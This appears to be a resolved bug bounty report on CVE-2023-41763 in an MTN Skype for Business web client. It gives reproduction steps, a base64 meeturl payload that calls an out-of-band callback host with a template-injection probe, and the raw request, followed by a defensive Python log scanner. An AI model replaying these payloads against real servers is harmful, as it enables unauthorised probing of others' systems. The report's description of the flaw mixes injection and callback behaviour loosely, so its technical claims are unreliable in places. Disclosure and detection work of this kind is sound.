CVE-2023-41763 Business Elevation of Privilege vulnerability on [.mtn.com]
Severity: High
## Vulnerability Details
## Summary:
The Microsoft Skype for Business installation on the remote host is missing security updates. The flaw was actively exploited. Attackers could access some sensitive information but not alter or restrict access to it; the impact relates primarily to confidentiality. The host is, therefore, affected by multiple vulnerabilities:
- An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2023-41763)
- A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2023-36780, CVE-2023-36786, CVE-2023-36789)
## Steps To Reproduce:
1. Navigate to https://fec-feweb-ext.mtn.com/lwa/Webpages/LwaClient.aspx
2. Intercept the request in Burp Suite and send it to Repeater
3. The vulnerable parameter is `lwa/Webpages/LwaClient.aspx?meeturl=`; I found this using recon
4. Used `base64` encoding to add the `template-injection` payload `LMN%{1337*1337}#.xx`:
```
http://attacker-payload-interact.sh/?id=LMN%{1337*1337}#.xx//
```
5. Sent the request again, and boom: **this server is vulnerable.**
Here's the HTTP request, with the vulnerable parameter, that triggers the issue:
```
GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2NtZDRjdm5laTU2Z3U5ZXRnMjIwb3AxaGI3ZWV3eDZjdS5vYXN0LmZ1bi8/aWQ9TE1OJTI1ezEzMzcqMTMzN30jLnh4Ly8= HTTP/1.1
Host: fec-feweb-ext.mtn.com
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```
```
HTTP/1.1 200 OK
Cache-Control: private
```
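The request above hands `LwaClient.aspx` a base64-encoded `meeturl`, and the report's indicator of compromise is a decoded `meeturl` that points at an attacker-controlled host and carries a template-injection marker. The following Python is an added, defensive example that is not part of the report or of Skype for Business: it scans IIS-style access logs for `meeturl` values, decodes them, and flags any that point outside an allowlist of approved meeting hosts or contain an expression marker such as `%{`. The allowlist, the host names, the client IPs, the log lines and the W3C field order are all constructed assumptions for the example.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# Hosts that LwaClient.aspx may legitimately be handed in meeturl.
# Constructed placeholder values for this example, not taken from the report.
ALLOWED_MEETING_HOSTS = {"meet.example.com", "lync.example.com"}

# Substrings that never belong in a genuine meeting URL but appear in
# server-side template/expression probes such as LMN%{1337*1337} in the report.
SUSPICIOUS_MARKERS = ("%{", "${", "#{", "{{")


@dataclass
class Finding:
    client_ip: str
    meeturl: str   # decoded URL, or the raw value when it would not decode
    reason: str


def encode_meeturl(url: str) -> str:
    """Build a meeturl value the way the client does: plain base64 of the target URL."""
    return base64.b64encode(url.encode()).decode()


def decode_meeturl(value: str) -> str:
    """Decode a logged meeturl value, tolerating the mangling seen in access logs:
    percent-encoding, '+' turned into a space, stripped '=' padding and the URL-safe
    alphabet. Raises binascii.Error (a ValueError) when the value is not base64."""
    value = unquote(value).strip().replace(" ", "+")
    value += "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        raw = base64.urlsafe_b64decode(value)  # still raises if not base64 either
    return raw.decode("utf-8", errors="replace")


def classify_meeturl(client_ip: str, encoded: str) -> Optional[Finding]:
    """Return a Finding when the decoded meeturl points somewhere it should not."""
    try:
        url = decode_meeturl(encoded)
    except ValueError:
        return Finding(client_ip, encoded, "meeturl is not valid base64")
    if any(marker in url for marker in SUSPICIOUS_MARKERS):
        return Finding(client_ip, url, "template/expression injection marker in meeturl")
    host = (urlsplit(url).hostname or "").lower()
    if host not in ALLOWED_MEETING_HOSTS:
        return Finding(client_ip, url, "meeturl host %r is not an approved meeting host" % host)
    return None


def query_param(query: str, name: str) -> List[str]:
    """Pull every value of `name` from a raw cs-uri-query field without touching '+'
    (urllib.parse.parse_qs would turn base64's '+' into a space)."""
    values = []
    for pair in query.split("&"):
        key, sep, val = pair.partition("=")
        if sep and key == name:
            values.append(val)
    return values


def scan_iis_log(lines) -> List[Finding]:
    """Scan IIS W3C-style lines for risky meeturl values. Assumed field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if not stem.lower().endswith("/lwa/webpages/lwaclient.aspx") or query == "-":
            continue
        for encoded in query_param(query, "meeturl"):
            finding = classify_meeturl(client_ip, encoded)
            if finding is not None:
                findings.append(finding)
    return findings


def _log_line(timestamp: str, client_ip: str, stem: str, query: str) -> str:
    return " ".join((timestamp, client_ip, "GET", stem, query, "200"))


# Constructed sample log: a legitimate join, an out-of-band probe shaped like the report's
# payload, a join to an unapproved host, an unparsable value and an unrelated page.
# IPs are documentation ranges and hosts are placeholders, not values from the report.
SAMPLE_LOG = [
    _log_line("2023-10-12 09:14:02", "192.0.2.10", "/lwa/Webpages/LwaClient.aspx",
              "meeturl=" + encode_meeturl("https://meet.example.com/join/123")),
    _log_line("2023-10-12 09:15:41", "198.51.100.9", "/lwa/Webpages/LwaClient.aspx",
              "meeturl=" + encode_meeturl("http://oast-callback.example.net/?id=LMN%{1337*1337}#.xx//")),
    _log_line("2023-10-12 09:16:05", "198.51.100.9", "/lwa/Webpages/LwaClient.aspx",
              "meeturl=" + encode_meeturl("https://not-our-lync.example.org/join/1")),
    _log_line("2023-10-12 09:17:30", "198.51.100.9", "/lwa/Webpages/LwaClient.aspx",
              "meeturl=not-base64!!"),
    _log_line("2023-10-12 09:18:02", "192.0.2.44", "/lwa/Webpages/default.aspx", "-"),
]

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"{f.client_ip}\t{f.reason}\t{f.meeturl}")
```

Run it as-is to see the three flagged lines; in practice, point `scan_iis_log` at the real W3C log after confirming the configured field order, and treat a flagged host that resolves to an external or internal non-meeting address as the trigger for checking whether KB5032429 is installed on that front end.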
## Supporting Material/References:
Microsoft has released KB5032429 to address this issue.
{F2970073}
{F2970077}
## Impact
The Elevation of Privilege vulnerability, CVE-2023-41763, posed a significant security risk because it allowed attackers to potentially breach internet perimeters by exploiting Skype for Business. While the vulnerability primarily affected confidentiality, it could have led to the exposure of sensitive information that in turn might provide access to internal networks.
## Report Stats
- Report ID: 2309291
- State: Closed
- Substate: resolved
- Upvotes: 2